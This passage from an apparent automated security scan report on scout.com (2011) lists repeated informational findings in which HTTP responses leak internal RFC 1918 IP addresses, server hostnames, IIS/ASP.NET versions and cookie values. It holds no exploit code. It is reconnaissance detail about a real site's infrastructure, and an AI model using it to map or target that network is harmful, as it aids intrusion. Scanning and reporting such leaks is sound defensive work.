<meta http-equi
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:37 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=jobs
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 49 ms
-->
...[SNIP]...

27.64. http://www.scout.com/3/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/privacy-policy.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:24 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:24 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36135

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:24 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=privacy-policy
Server IP: 192.168.20.57, STATIC2
Page Execution Time: 60 ms
-->
...[SNIP]...

27.65. http://www.scout.com/3/privacy-policy.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/privacy-policy.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/privacy-policy.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:33 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:33 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 36133

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Privacy Policy</title>
<meta http-equiv="
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:33 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=privacy-policy
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 59 ms
-->
...[SNIP]...

27.66. http://www.scout.com/3/recruiting-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/recruiting-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/recruiting-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:02 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:02 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12567

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:27:02 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=recruiting-links
Server IP: 192.168.20.57, STATIC2
Page Execution Time: 83 ms
-->
...[SNIP]...

27.67. http://www.scout.com/3/recruiting-links.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/recruiting-links.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/recruiting-links.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:40 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:40 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 12565

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com</title>
<meta http-equiv="Content-Type" co
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:40 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=recruiting-links
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 45 ms
-->
...[SNIP]...

27.68. http://www.scout.com/3/security-information.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/security-information.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/security-information.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:50 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:50 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 13553

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Security Information</title>
<meta http-e
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:50 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=security-information
Server IP: 192.168.20.88, MARKET
Page Execution Time: 35 ms
-->
...[SNIP]...

27.69. http://www.scout.com/3/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/terms-of-service.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:32 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 17:26:32 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53552

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:32 AM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=terms-of-service
Server IP: 192.168.20.56, STATIC1
Page Execution Time: 68 ms
-->
...[SNIP]...

27.70. http://www.scout.com/3/terms-of-service.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /3/terms-of-service.html

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /3/terms-of-service.html HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:26:00 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:36:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 53554

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Terms of Service</title>
<meta http-equiv
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:00 PM
URL: http://www.scout.com:80/Legacy/a.z?s=143&p=3&c=terms-of-service
Server IP: 192.168.20.57, STATIC2
Page Execution Time: 71 ms
-->
...[SNIP]...

27.71. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 17:15:28 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:25:28 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 5 ms
Vary: Accept-Encoding
Content-Length: 22871

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:15:05 AM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=3&blipid=14568
Server IP: 192.168.20.76, DRAVUS
Page Execution Time: 32 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB2) from url (http://192.168.20.181/Legacy/a.z?s=143&p=3&blipid=14568) in 5 ms. DateTime = 1/30/2011 9:15:28 AM -->

27.72. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:11 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:11 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22873

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:25:11 PM
URL: http://192.168.20.186:80/Legacy/a.z?s=143&p=3&blipid=14568
Server IP: 192.168.20.63, CEDAR
Page Execution Time: 29 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB9) from url (http://192.168.20.186/Legacy/a.z?s=143&p=3&blipid=14568) in 44 ms. DateTime = 1/29/2011 5:25:11 PM -->

27.73. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 404 Not Found
Connection: close
Date: Sun, 30 Jan 2011 01:27:22 GMT
Server: Microsoft-IIS/6.0
Server: Market
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 01:37:22 GMT
Content-Type: text/html
Content-Length: 11945

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
       <title>Sc
...[SNIP]...
<!--
Fetch info:
Source: 192.168.10.106
URL: http://192.168.10.106/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
By: -1
Date: 1/27/2011 4:49:27 PM
-->
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Thursday, January 27, 2011 4:49:27 PM
URL: http://192.168.10.106:80/Legacy/a.z?s=143&p=26&cfg=HTTP404&fromprefetch=1
Server IP: 192.168.20.210, GREENLAKE
Page Execution Time: 69 ms
-->
...[SNIP]...

27.74. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 01:25:48 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 01:35:48 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 54 ms
Vary: Accept-Encoding
Content-Length: 22871

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:25:48 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=3&blipid=14568
Server IP: 192.168.20.77, SPRUCE
Page Execution Time: 28 ms
-->
...[SNIP]...
<!-- streamed by server (SUMMIT) from url (http://192.168.20.181/Legacy/a.z?s=143&p=3&blipid=14568) in 54 ms. DateTime = 1/29/2011 5:25:48 PM -->

27.75. http://www.scout.com/a.z

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /a.z

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /a.z?s=143&p=3&blipid=14568 HTTP/1.1
Host: www.scout.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; RefId=0; BrandId=0; SessionBrandId=0; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; __utmc=202704078; __utmb=202704078.3.9.1296350699791

Response

HTTP/1.1 200 OK
Cache-Control: public, s-maxage=600
Date: Sun, 30 Jan 2011 19:57:34 GMT
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 20:07:34 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb9
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.186 in 44 ms
Vary: Accept-Encoding
Content-Length: 22874

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Choose College Team Site</title>
<meta ht
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 11:57:34 AM
URL: http://192.168.20.186:80/Legacy/a.z?s=143&p=3&blipid=14568
Server IP: 192.168.20.77, SPRUCE
Page Execution Time: 29 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB9) from url (http://192.168.20.186/Legacy/a.z?s=143&p=3&blipid=14568) in 44 ms. DateTime = 1/30/2011 11:57:34 AM -->

27.76. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:16:58 GMT
Server: Microsoft-IIS/6.0
Server: Static1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14373

<!-- Start frame cache output for cachekey = (s=143&p=9&c=999.header) --><!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<ht
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 9:16:58 AM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319758177849275&NoRedir=1
Server IP: 192.168.20.72, SANDPOINT
Page Execution Time: 184 ms
-->
...[SNIP]...

27.77. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 17:17:16 GMT
Server: Microsoft-IIS/6.0
Server: Sodo
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14261

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Sunday, January 30, 2011 3:49:32 AM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319561723094073&NoRedir=1
Server IP: 192.168.20.92, CHERRY
Page Execution Time: 176 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB4) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319561723094073&NoRedir=1) in 191 ms. DateTime = 1/30/2011 3:49:32 AM -->
...[SNIP]...

27.78. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /search.aspx?s=143 HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:31 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14267

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 8:35:08 AM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634318869084614116&NoRedir=1
Server IP: 192.168.20.75, SCOUTWEB8
Page Execution Time: 188 ms
-->
...[SNIP]...
<!-- streamed by server (SCOUTWEB1) from url (http://192.168.20.181/Legacy/a.z?s=143&p=9&c=1&GetFrames=634318869084614116&NoRedir=1) in 213 ms. DateTime = 1/29/2011 8:35:08 AM -->
...[SNIP]...

27.79. http://www.scout.com/search.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /search.aspx

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /search.aspx HTTP/1.1
Host: www.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BrandId=0; RefId=0; __utmz=202704078.1296350458.4.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/8; __utma=202704078.801620371.1294455998.1295040115.1296350458.4; SessionBrandId=0; __utmc=202704078; UnicaNIODID=1jlicFwG3oz-Ww7Tb2t; __utmb=202704078.6.9.1296350713426;

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 01:27:49 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 12959

<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>Scout.com: Search</title>
<meta http-equiv="Content-
...[SNIP]...
<!--
v. 6.24.1.5335
Server Date: Saturday, January 29, 2011 5:26:16 PM
URL: http://192.168.20.181:80/Legacy/a.z?s=143&p=9&c=1&GetFrames=634319187767144144&NoRedir=1
Server IP: 192.168.20.70, STONE
Page Execution Time: 163 ms
-->
...[SNIP]...

27.80. http://www.scout.com/widgets/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.scout.com
Path:   /widgets/

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /widgets/ HTTP/1.1
